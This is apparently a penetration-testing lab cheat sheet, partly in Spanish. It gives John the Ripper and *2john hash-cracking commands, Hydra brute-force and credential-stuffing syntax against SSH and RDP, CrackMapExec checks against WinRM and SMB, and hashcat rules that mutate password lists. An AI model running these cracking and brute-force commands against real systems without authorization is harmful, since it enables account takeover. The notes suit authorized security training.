John The Ripper

john --format=<hash_type> <hash or hash_file>

john --format=sha256 hashes_to_crack.txt

john --wordlist=<wordlist_file> --rules <hash_file>

Incremental Mode in John

john --incremental <hash_file>

Cracking Files

<tool> <file_to_crack> > file.hash
pdf2john server_doc.pdf > server_doc.hash

john server_doc.hash
# OR
john --wordlist=<wordlist.txt> server_doc.hash

locate *2john*

/usr/bin/bitlocker2john
/usr/bin/dmg2john
/usr/bin/gpg2john
/usr/bin/hccap2john
/usr/bin/keepass2john
/usr/bin/putty2john
/usr/bin/racf2john
/usr/bin/rar2john
/usr/bin/uaf2john
/usr/bin/vncpcap2john
/usr/bin/wlanhcx2john
/usr/bin/wpapcap2john
...SNIP...

Hydra

hydra -L user.list -P password.list ssh://10.129.42.197

 hydra -L user.list -P password.list rdp://10.129.42.197

Credential Stuffing - Hydra Syntax

 hydra -C <user_pass.list> <protocol>://<IP>

hydra -C user_pass.list ssh://10.129.42.197

CrackMapExec

crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

crackmapexec winrm 10.129.42.197 -u user.list -p password.list

crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

smbclient -U user \\\\10.129.42.197\\SHARENAME

Password Mutations

Hashcat Rule File

cat custom.rule

Generating Rule-based Wordlist

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.lis

Hashcat Existing Rules

ls /usr/share/hashcat/rules/

Generación de listas de palabras basadas en reglas

Función*	Descripción
:	No hacer nada
l	Poner todas las letras en minúscula.
u	Todas las letras en mayúsculas.
c	Escriba con mayúscula la primera letra y con minúscula las demás.
sXY	Reemplazar todas las instancias de X con Y.
$!	Añade el carácter de exclamación al final.

cat custom.rule

:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

$ hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
$ cat mut_password.list

password
Password
passw0rd
Passw0rd
p@ssword
P@ssword
P@ssw0rd
password!
Password!